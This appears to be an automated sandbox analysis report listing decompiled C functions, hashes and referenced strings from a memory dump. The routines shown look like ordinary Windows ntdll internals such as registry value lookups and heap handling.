Instruction Fuzzy Hash: 53518C717047429FD329DF28D9C8B1BBBE5FBC4614F04092DFAA69B291D670E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0154F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0154F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01534120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01559830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01559990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E015595D0();
							goto L11;
						} else {
							_t109 = L01534620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0155F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E015595D0();
										L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0154f0d3
0x0154f0d9
0x0154f0e0
0x0154f0e7
0x0154f0f2
0x0154f0f4
0x0154f0f8
0x0154f100
0x0154f108
0x0154f10d
0x0154f115
0x0154f116
0x0154f11f
0x0154f123
0x0154f124
0x0154f12c
0x0154f130
0x0154f134
0x0154f13d
0x0154f144
0x0154f14b
0x0154f152
0x0158bab0
0x0158bab0
0x0154f158
0x0154f158
0x0154f15a
0x0154f160
0x0154f165
0x0154f166
0x0154f16f
0x0154f173
0x0158baa7
0x0158baa7
0x0158baab
0x00000000
0x0154f179
0x0154f18d
0x0154f191
0x0158baa2
0x00000000
0x0154f197
0x0154f19b
0x0154f1a2
0x0154f1a9
0x0154f1af
0x0154f1b2
0x0154f1b6
0x0154f1b9
0x0154f1c4
0x0154f1d8
0x0154f1df
0x0154f1e3
0x0154f1eb
0x0154f1ee
0x0154f1f4
0x0154f20f
0x0158bab7
0x0158babb
0x0158bacc
0x0158bad1
0x0154f215
0x0154f218
0x0154f226
0x0154f22b
0x00000000
0x0154f22b
0x0154f1f6
0x0154f1f6
0x0154f1f9
0x0154f1fb
0x0154f1fb
0x0154f1f4
0x0154f191
0x0154f173
0x0154f152
0x0154f203

Strings

@, xrefs: 0154F124

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 01ff37e27b786a847566f36d2014657572f3f09272aba470126fd91903a18985
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 9E517071504712AFD321DF19C840A6BBBF8FF98714F00892EFA959B650E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01593540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01593540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x160d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01550BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01593706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0155FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01593540;
						E0155FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0156DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E015A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E015597C0();
					}
					return E0155B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01593971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01593884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0155FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01559650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01593787(_a4,  &_v352, _t80);
						}
					}
					L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E015595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01593552
0x0159355a
0x0159355d
0x01593566
0x01593567
0x0159357e
0x0159358f
0x015935a1
0x015935a5
0x0159366b
0x0159366b
0x0159366d
0x01593672
0x01593679
0x01593685
0x0159368d
0x0159369d
0x015936a7
0x015936b8
0x015936c6
0x015936c7
0x015936dc
0x015936e1
0x015936e7
0x015936e9
0x015936e9
0x01593703
0x01593703
0x015935b5
0x015935c0
0x015935c4
0x00000000
0x00000000
0x015935ca
0x015935d7
0x015935e2
0x015935e6
0x015935e8
0x015935f5
0x015935fa
0x01593603
0x01593604
0x01593609
0x0159360a
0x01593612
0x01593613
0x0159361e
0x01593622
0x01593628
0x0159362f
0x0159362f
0x01593636
0x01593638
0x0159363b
0x01593642
0x01593642
0x01593636
0x01593657
0x01593657
0x0159365c
0x01593662
0x01593669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0159358F

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: d1bd775e932c52ee9d6c70700a5bddaf00f2eb7d25edf06a6a46ff7862a32b76
Instruction ID: 205d109c25f3a91d397167bcac60ef45fc163760818bafb922de72ddc7f6670e
Opcode Fuzzy Hash: d1bd775e932c52ee9d6c70700a5bddaf00f2eb7d25edf06a6a46ff7862a32b76
Instruction Fuzzy Hash: 3B4145B1D0052E9BDF61DA60CC94F9EB77CBB54714F0045A6EA09AF240DB309E88CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015E05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E015E05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E015E07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01559730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E015DA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E015DA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E015E1293(_t79, _v40, E015E07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01537D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E015D138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x015e05c5
0x015e05ca
0x015e05d3
0x015e06db
0x015e06db
0x015e06dd
0x015e06e3
0x015e06e3
0x015e05dd
0x015e05e7
0x015e05f6
0x015e0600
0x015e0607
0x015e0610
0x015e0615
0x015e061a
0x015e061c
0x015e061e
0x015e0624
0x015e0625
0x015e0627
0x015e0628
0x015e0631
0x015e0640
0x015e064d
0x015e0654
0x015e0654
0x015e0631
0x015e066d
0x015e0674
0x00000000
0x00000000
0x015e0692
0x015e069e
0x015e06b0
0x015e06a0
0x015e06a9
0x015e06a9
0x015e06b8
0x015e06d6
0x015e06d6
0x00000000

Strings

`, xrefs: 015E0633

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 7d190b7fc2466a19bf0d1450ee6a48978ec4eae382a9e0a0ba398e6dea7a3555
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 9E31CF72B002466BE724DE28CC89F9A7BD9BBC4754F144229FA549F2C0D6B0E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01593884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01593884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01559650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01534620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01559650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01593893
0x01593896
0x01593899
0x0159389f
0x015938a0
0x015938a4
0x015938a9
0x015938ac
0x015938ad
0x015938ae
0x015938af
0x015938b1
0x015938b4
0x015938bb
0x015938bc
0x015938bd
0x015938c4
0x015938c8
0x015938ca
0x015938ca
0x015938d5
0x0159393e
0x01593940
0x01593942
0x01593952
0x01593954
0x01593961
0x01593961
0x01593967
0x0159396e
0x0159396e
0x01593947
0x0159394c
0x00000000
0x0159394c
0x015938ea
0x015938ee
0x015938f8
0x015938f9
0x015938ff
0x01593900
0x01593902
0x01593903
0x0159390b
0x0159390f
0x01593950
0x00000000
0x01593950
0x01593915
0x0159391d
0x0159391d
0x01593922
0x01593926
0x00000000
0x01593928
0x0159392b
0x0159392b
0x01593935
0x01593937
0x01593937
0x00000000
0x01593935
0x01593926
0x015938f0
0x00000000

Strings

BinaryName, xrefs: 015938B4

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 2448804c258010b280a597cf48512b4a81706e5c7bece64145af29b2b0cc9833
Instruction ID: 3e4c7fb987b39a15f77e86003daf36a30c500586ad265939684ff6fbdce2f8d9
Opcode Fuzzy Hash: 2448804c258010b280a597cf48512b4a81706e5c7bece64145af29b2b0cc9833
Instruction Fuzzy Hash: ED31CE7290151AEFEF56DE68C945E7FBBB4FB80B20F014169E914AF290D7309E04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0154D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0154D303

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 53ccd71ba4274c56bc2ce2dd97d900db81449b95d076417400d8242e258ff647
Instruction ID: 0f0f1e3a56521fbff7db036e2e00192bf8439b97a3d54b9b39ed76519adef2cb
Opcode Fuzzy Hash: 53ccd71ba4274c56bc2ce2dd97d900db81449b95d076417400d8242e258ff647
Instruction Fuzzy Hash: 313191B15083069FC361DF68C98096FBBF8FBE9658F00092EF9959B250D634DD05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01521B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 01521BC5

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 99416978076283d674d08e40ab2967bff0713f2e3289b9975920428a2340e4ea
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: D921C57B501A39ABDB229A59D884F5FBBBDBF86650F154425FE04AF240D630DD009BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0153F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 0153F73F

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ed998bcfad9cb618ff83b0d4ee429b94526d2b5232e11dbe25721c43761681e9
Instruction ID: 1bad96128215a88a62306a1bd12dfc1fefac6660d7bbcef5a09f36840997e594
Opcode Fuzzy Hash: ed998bcfad9cb618ff83b0d4ee429b94526d2b5232e11dbe25721c43761681e9
Instruction Fuzzy Hash: 4E119035F046028BEB274E1D8490B3A77D5BBC5664F24493BE965CF392DB70D8418383

Uniqueness

Uniqueness Score: -1.00%

Function 015C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 015C8E21

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 0ff56b68bb30cbf0ab5fc225b46d25ffc3d93cbbc17360258254e780e77ccb4c
Instruction ID: 5701c851c4268abae310adebb0f87760d7bcc6ae23d68d653f8a0658b6513b26
Opcode Fuzzy Hash: 0ff56b68bb30cbf0ab5fc225b46d25ffc3d93cbbc17360258254e780e77ccb4c
Instruction Fuzzy Hash: 30117571E10349DEDB25CFE989057ACBBB4BB44710F24461EE568AF382D3740A02CF14

Uniqueness

Uniqueness Score: -1.00%

Function 015AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 015AFF60

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: ac50e337e6ff540132b906b3b484cdbb99fd32c06c06a684c9b219fc2fa9c250
Instruction ID: 2c3f29a4896a6cddee1f3ac8641ab33dec68e2602c9b0c9594619efaf71e3a88
Opcode Fuzzy Hash: ac50e337e6ff540132b906b3b484cdbb99fd32c06c06a684c9b219fc2fa9c250
Instruction Fuzzy Hash: FC11ED71A90145EFDB26EB94CD48F9CBBB5FB48714F548444E6086F2A1C7789940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 015E5BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a282610da1bf7d5560f7e47d3faff0a2e1b06ffbc5b4bd0abbe30893a2331d
Instruction ID: 42530e8a18956241d01405e900eb3136d662763240a66a0a62adb1413cdc367e
Opcode Fuzzy Hash: 15a282610da1bf7d5560f7e47d3faff0a2e1b06ffbc5b4bd0abbe30893a2331d
Instruction Fuzzy Hash: 75424875D10229CFDB28CF68C884BADBBF1BF59304F1481AAD95DAB242E7309985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01534120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bc7413fb213e97b1cc9550a4a8bdfa1a1c8a6733d3f00d1351cf77eea9465b
Instruction ID: ebf7fd12c2e10869173a2559ccbcb60106840d081d237a49f02b8362418299a4
Opcode Fuzzy Hash: c1bc7413fb213e97b1cc9550a4a8bdfa1a1c8a6733d3f00d1351cf77eea9465b
Instruction Fuzzy Hash: 9EF167716083128BD724CF59D482A7ABBE1FFC8614F14896EF986CF290E734D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 015420A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4ac21526a6a160a8a2d375aaa39d05b21a59a11db5e29dcfec72600531323d
Instruction ID: 6dd2996ff975312d6a0303b3201ff21184ba188284e4b827c461bcfdb0f4fd8c
Opcode Fuzzy Hash: 9e4ac21526a6a160a8a2d375aaa39d05b21a59a11db5e29dcfec72600531323d
Instruction Fuzzy Hash: E7F1C031A183529FD726DE2CD84076FBBE5BB85318F04892DF9959F281E774D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0152D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1970e30ea614d2f6f281d3b8512c0d1b90821581e5f8feccb4c6b022347001
Instruction ID: 2e0571f358479842ddace2c5880addf7e074ca3d58a123913703fcb53e1d96ab
Opcode Fuzzy Hash: 2c1970e30ea614d2f6f281d3b8512c0d1b90821581e5f8feccb4c6b022347001
Instruction Fuzzy Hash: 67E1A132A0136A8FEB35CF58CC84B6EB7B2BF86304F044199D9099F2D1D774A981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0152849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aae47e02f8c92639dd3d050fc4a124fb877b4b2b829dddb75849c65a63fc8c3
Instruction ID: 1c2e6ce49f8575fd98a969c266266b1c4ea9d99e63f7be355df07613761cb9ea
Opcode Fuzzy Hash: 1aae47e02f8c92639dd3d050fc4a124fb877b4b2b829dddb75849c65a63fc8c3
Instruction Fuzzy Hash: CFB17E71E0021ADFDB25DFE8C980AAEBBF5FF99304F14452AE505AF285D770A841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0154513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94c5811f20c14bf82e14e0637ae6ee6db59dbfae8442e9500397e760091d525
Instruction ID: dbcf82d1a1339565b199b36d4345d15ee0c6a9a1ac28b8b3a591b6959fec1ab4
Opcode Fuzzy Hash: b94c5811f20c14bf82e14e0637ae6ee6db59dbfae8442e9500397e760091d525
Instruction Fuzzy Hash: 54C144755083818FD355CF28C480A5AFBF1BF88308F188A6EF9999B392D770E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 015403E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8689e0c7b53b429ffbe9a69c937292ca4afceaed297b998d8b096527f6e27b44
Instruction ID: 77866df53da08a8c5a2f8ae5f8143d7adc05317c36520c92bf293102fa252ce1
Opcode Fuzzy Hash: 8689e0c7b53b429ffbe9a69c937292ca4afceaed297b998d8b096527f6e27b44
Instruction Fuzzy Hash: 3991D131E00216AFEB22AA6CCC48BEE7BA4BB45728F150265FE51AF2D1D7749D40C791

Uniqueness

Uniqueness Score: -1.00%

Function 0151C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b713cb8f2503bbd707ec204bd4b56ecb5820aa2c1f706bf59cdd0af22c662c35
Instruction ID: 019ae4f12508252d50b7521b76d46b8d5963ac6a7fc101724a1ecf2af394ce8e
Opcode Fuzzy Hash: b713cb8f2503bbd707ec204bd4b56ecb5820aa2c1f706bf59cdd0af22c662c35
Instruction Fuzzy Hash: 54819776644202CBDB16DE58C880A7FB7E5FB8C354F24485AEE85AF241D370ED41C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 015AB8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac74840977f15ad8e29e8db4505782ddaecbab888c489e943fd6cdc749a46560
Instruction ID: 196b780cb435b3971bb274470ec77aaad4a562c528bc13fa6a8fb467b578a9eb
Opcode Fuzzy Hash: ac74840977f15ad8e29e8db4505782ddaecbab888c489e943fd6cdc749a46560
Instruction Fuzzy Hash: 9671F132280706EFE7328F18C850F5EBBE5FB84724F544928E6558F6A1DBB5E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01596DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 2f219b149b7e9e9f8baff8987e455952b2c5258734c3c417c741a752e05179d4
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 71716071E0061AEFDF11DFA9C944AEEBBB9FF88710F104469E505EB250E734AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015152A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2749bd0441185aa53971534662cf4f35de8cf54e62ae89bb73b046e1e23aae
Instruction ID: 128c3d36ed9690b606f1bc1382b5ac5783c1466a738cd137e41aaf14433c35cc
Opcode Fuzzy Hash: 1e2749bd0441185aa53971534662cf4f35de8cf54e62ae89bb73b046e1e23aae
Instruction Fuzzy Hash: 4951BD72205742AFD722DF68C841B6BBBE4FFA5714F10091AF4A58B691E774E840C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01542AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd007ad793fbe95759e516e0c3349525b642e4c6ef48e48428da8b45e9c1959
Instruction ID: 9d1d6e1296e9279b8c408402145a5dc53f374bb3dc699795f02cd52ef2cc091f
Opcode Fuzzy Hash: 7fd007ad793fbe95759e516e0c3349525b642e4c6ef48e48428da8b45e9c1959
Instruction Fuzzy Hash: 2C51AF76A101258FCB19CF1CD8909BEB7F5FB88704B1A845AF846AF355D730AA91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015DAE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe2dbaff89d19bae4f0c34b9ac44e1b7d5808812ffe2a9e1290d00ece46784e
Instruction ID: 02b1922ecd54560c86ef9e3ab1146a69ee3cde80810580e88ac80ad3f484c4d8
Opcode Fuzzy Hash: 6fe2dbaff89d19bae4f0c34b9ac44e1b7d5808812ffe2a9e1290d00ece46784e
Instruction Fuzzy Hash: 9341A0B17006139BEB369A2DC894B6FB799FB94620F044699F9268F2D0DB34D841C791

Uniqueness

Uniqueness Score: -1.00%

